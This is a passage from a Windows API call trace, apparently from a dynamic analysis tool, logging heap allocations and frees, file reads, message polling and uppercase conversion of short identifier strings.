hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0207.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0207.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0207.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0207.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0207.566] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0207.566] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x2427, lpOverlapped=0x0) returned 1 [0207.568] ReadFile (in: hFile=0x1f8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0207.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2427) returned 0x34a2048 [0207.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0207.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2427) returned 0x34a4478 [0207.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0207.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.570] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2427) returned 0x34a2048 [0207.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0207.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0207.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0207.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.572] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0207.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0207.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2427) returned 0x34a2048 [0207.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0207.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2427) returned 0x34a68a8 [0207.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0207.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0207.576] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.576] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0207.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0207.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.577] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0207.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0207.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0207.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.578] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.581] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.582] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.582] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.583] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.583] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.583] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.583] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.584] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: 